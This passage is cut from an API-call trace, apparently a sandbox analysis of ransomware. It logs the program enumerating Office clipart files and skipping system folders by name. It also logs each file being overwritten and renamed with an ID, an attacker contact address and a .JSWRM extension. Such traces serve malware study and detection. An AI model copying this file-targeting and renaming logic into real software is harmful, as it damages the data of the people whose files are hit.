files\\microsoft office\\root\\clipart\\pub60cor\\whirl1.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0099.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0099.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0099.780] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110a3267, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110a3267, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110a3267, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb96, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WHIRL2.WMF", cAlternateFileName="")) returned 1 [0099.780] lstrcmpiW (lpString1="WHIRL2.WMF", lpString2=".") returned 1 [0099.780] lstrcmpiW (lpString1="WHIRL2.WMF", lpString2="..") returned 1 [0099.780] lstrcmpiW (lpString1="WHIRL2.WMF", lpString2="...") returned 1 [0099.780] lstrcmpiW (lpString1="WHIRL2.WMF", lpString2="windows") returned -1 [0099.780] lstrcmpiW (lpString1="WHIRL2.WMF", lpString2="recovery") returned 1 [0099.780] lstrcmpiW (lpString1="WHIRL2.WMF", lpString2="perflogs") returned 1 [0099.780] lstrcmpiW (lpString1="WHIRL2.WMF", lpString2="documents and settings") returned 1 [0099.780] lstrcmpiW (lpString1="WHIRL2.WMF", lpString2="$RECYCLE.BIN") returned 1 [0099.781] lstrcmpiW (lpString1="WHIRL2.WMF", lpString2="system volume information") returned 1 [0099.781] lstrcmpiW (lpString1="WHIRL2.WMF", lpString2="msocache") returned 1 [0099.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0099.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHIRL2.WMF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHIRL2.WMF", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WHIRL2.WMF", lpUsedDefaultChar=0x0) returned 10 [0099.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0099.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0099.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHIRL2.WMF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHIRL2.WMF", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WHIRL2.WMF", lpUsedDefaultChar=0x0) returned 10 [0099.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0099.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0099.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0099.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0099.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WHIRL2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\whirl2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.781] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2966) returned 1 [0099.781] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb90) returned 0x205850 [0099.781] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0xb90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0xb90, lpOverlapped=0x0) returned 1 [0099.784] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.784] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0xb90, lpOverlapped=0x0) returned 1 [0099.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0099.784] CloseHandle (hObject=0x314) returned 1 [0099.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0099.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0099.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0099.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0099.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0099.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0099.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0099.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0099.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.784] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WHIRL2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\whirl2.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WHIRL2.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\whirl2.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0099.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0099.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0099.785] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10c2accf, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10c2accf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11030b47, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa16, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WING1.WMF", cAlternateFileName="")) returned 1 [0099.785] lstrcmpiW (lpString1="WING1.WMF", lpString2=".") returned 1 [0099.785] lstrcmpiW (lpString1="WING1.WMF", lpString2="..") returned 1 [0099.785] lstrcmpiW (lpString1="WING1.WMF", lpString2="...") returned 1 [0099.785] lstrcmpiW (lpString1="WING1.WMF", lpString2="windows") returned 1 [0099.785] lstrcmpiW (lpString1="WING1.WMF", lpString2="recovery") returned 1 [0099.785] lstrcmpiW (lpString1="WING1.WMF", lpString2="perflogs") returned 1 [0099.785] lstrcmpiW (lpString1="WING1.WMF", lpString2="documents and settings") returned 1 [0099.785] lstrcmpiW (lpString1="WING1.WMF", lpString2="$RECYCLE.BIN") returned 1 [0099.786] lstrcmpiW (lpString1="WING1.WMF", lpString2="system volume information") returned 1 [0099.786] lstrcmpiW (lpString1="WING1.WMF", lpString2="msocache") returned 1 [0099.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0099.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WING1.WMF", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WING1.WMF", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WING1.WMF", lpUsedDefaultChar=0x0) returned 9 [0099.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0099.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0099.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WING1.WMF", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WING1.WMF", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WING1.WMF", lpUsedDefaultChar=0x0) returned 9 [0099.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0099.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0099.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0099.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0099.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WING1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wing1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.836] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2582) returned 1 [0099.836] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa10) returned 0x20c6c0 [0099.836] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0xa10, lpOverlapped=0x0) returned 1 [0099.837] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.837] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0xa10, lpOverlapped=0x0) returned 1 [0099.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0099.837] CloseHandle (hObject=0x314) returned 1 [0099.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0099.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0099.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0099.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0099.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0099.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0099.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0099.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0099.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.838] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WING1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wing1.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WING1.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wing1.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0099.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0099.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0099.839] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11030b47, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11030b47, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11030b47, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x976, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WING2.WMF", cAlternateFileName="")) returned 1 [0099.839] lstrcmpiW (lpString1="WING2.WMF", lpString2=".") returned 1 [0099.839] lstrcmpiW (lpString1="WING2.WMF", lpString2="..") returned 1 [0099.839] lstrcmpiW (lpString1="WING2.WMF", lpString2="...") returned 1 [0099.839] lstrcmpiW (lpString1="WING2.WMF", lpString2="windows") returned 1 [0099.839] lstrcmpiW (lpString1="WING2.WMF", lpString2="recovery") returned 1 [0099.839] lstrcmpiW (lpString1="WING2.WMF", lpString2="perflogs") returned 1 [0099.839] lstrcmpiW (lpString1="WING2.WMF", lpString2="documents and settings") returned 1 [0099.839] lstrcmpiW (lpString1="WING2.WMF", lpString2="$RECYCLE.BIN") returned 1 [0099.839] lstrcmpiW (lpString1="WING2.WMF", lpString2="system volume information") returned 1 [0099.839] lstrcmpiW (lpString1="WING2.WMF", lpString2="msocache") returned 1 [0099.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WING2.WMF", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WING2.WMF", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WING2.WMF", lpUsedDefaultChar=0x0) returned 9 [0099.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0099.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WING2.WMF", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WING2.WMF", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WING2.WMF", lpUsedDefaultChar=0x0) returned 9 [0099.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0099.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0099.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0099.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0099.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WING2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wing2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.840] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2422) returned 1 [0099.840] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x970) returned 0x20c6c0 [0099.840] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x970, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x970, lpOverlapped=0x0) returned 1 [0099.842] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.842] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x970, lpOverlapped=0x0) returned 1 [0099.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0099.842] CloseHandle (hObject=0x314) returned 1 [0099.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0099.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0099.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0099.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0099.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0099.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0099.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0099.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0099.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.843] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WING2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wing2.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WING2.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wing2.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0099.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0099.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0099.847] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10c77030, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b03, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WNTER_01.MID", cAlternateFileName="")) returned 1 [0099.847] lstrcmpiW (lpString1="WNTER_01.MID", lpString2=".") returned 1 [0099.847] lstrcmpiW (lpString1="WNTER_01.MID", lpString2="..") returned 1 [0099.847] lstrcmpiW (lpString1="WNTER_01.MID", lpString2="...") returned 1 [0099.847] lstrcmpiW (lpString1="WNTER_01.MID", lpString2="windows") returned 1 [0099.847] lstrcmpiW (lpString1="WNTER_01.MID", lpString2="recovery") returned 1 [0099.847] lstrcmpiW (lpString1="WNTER_01.MID", lpString2="perflogs") returned 1 [0099.847] lstrcmpiW (lpString1="WNTER_01.MID", lpString2="documents and settings") returned 1 [0099.847] lstrcmpiW (lpString1="WNTER_01.MID", 